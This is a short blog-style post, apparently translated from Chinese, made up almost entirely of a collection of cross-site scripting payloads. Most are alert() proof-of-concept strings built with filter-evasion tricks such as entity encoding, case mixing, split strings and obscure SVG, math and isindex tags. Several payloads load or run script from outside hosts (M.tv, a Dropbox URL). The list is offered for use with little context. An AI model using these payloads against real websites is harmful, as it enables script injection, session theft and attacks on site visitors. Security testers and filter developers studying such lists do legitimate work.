XSS payload

xss 

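I didn't know what to write; lately nobody has come to me with questions. Heshang's Linux server got hit again, though, and I feel like that could make a good write-up, but I don't want to write it today, I'm in a bad mood. So today I'll just post some XSS payloads that little M put together himself.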


<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

<svg/onload=document.body.appendChild(document.createElement(/script/.source)).src='http://M.tv/2Z'>

<svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect width=100 height=100 /></a> // fixed in Chrome 59

<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('1')" /><a id=x><circle r=100>

<svg/onload=setTimeout('ale'+'rt(1)',0)>

<svg onload='JavascRipT:alert%281%29'>

<svg/onload ="location='jav'+'ascript'+':%2'+'0aler'+'t%20%2'+'81%'+'29'">

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<sVg><scRipt >alert&lpar;1&rpar; {Opera}

<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

<svg><script xlink:href=data&colon;,window.open('https://www.baidu.com/') </script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>

<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>

<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>

<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>

<svg><x><script>alert`1`</x>

<svg><x><script>alert&grave;1&grave;</x>

<svg><script>0<a></a>;alert(1)</script>

<svg><script>0<a></a>;alert&grave;1&grave;</script>

<svg><script>alert&grave;1&grave;</script>

<svg><script>alert&#40;/1/&#41;</script>

<svg><script>alert&#x28;/1/&#x29;</script>

<svg><script>\u0061\u006c\u0065\u0072\u0074&grave;1&grave;</script>

<svg><fuck><script>\u0061\u006c\u0065\u0072\u0074&grave;1&grave;</fuck>

<isindex type=image src=M onerror=alert`M`>

<BODY ONLOAD=alert('M')>

<isindex x="javascript:" onmouseover="alert('M')">

<isindex onmouseover=alert('M')>

<isindex type=image src=M onerror=alert('M')>

<M/onclick="alert(1)">M

<b/ondrag=alert()>M

<math><a xlink:href=javascript:alert(1)>M

<button/onclick=alert(1) >M</button>

<button onfocus=alert(1) autofocus>

<p/onmouseover=javascript:alert(1); >M</p>

<body onload=alert(1)>

<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<var onmouseover="prompt(1)">KCF</var>

<div/onmouseover='alert(1)'>X

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onclick="alert(52)">

<marquee onstart="alert('sometext')"></marquee>

<marquee onscroll=alert(1)>

<isindex type=image src=M onerror=alert(1)>

<isindex action=javascript:alert(1) type=image>

<math href="javascript:javascript:alert(1)">CLICKME</math>

<math><y/xlink:href=javascript:alert(51)>test1

<math> <maction actiontype="statusline#http://wangnima.com" xlink:href="javascript:alert(49)">CLICKME</maction> </math>

<svg onload=alert(1)>

<q/oncut=alert()>M

<s/onclick=alert()>M

<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('1')"/><a id=x><circle r=100>

<form oninput="alert(1)"><input type="range"

<meter onmouseover="alert(1)"

<M contenteditable onblur=alert(1)>lose focus!

<M onclick=alert(1)>click this!

<M oncopy=alert(1)>copy this!

<M oncontextmenu=alert(1)>right click this!

<M oncut=alert(1)>copy this!

<M ondblclick=alert(1)>double click this!

<M ondrag=alert(1)>drag this!

<M contenteditable onfocus=alert(1)>focus this!

<M contenteditable oninput=alert(1)>input here!

<M contenteditable onkeydown=alert(1)>press any key!

<M contenteditable onkeypress=alert(1)>press any key!

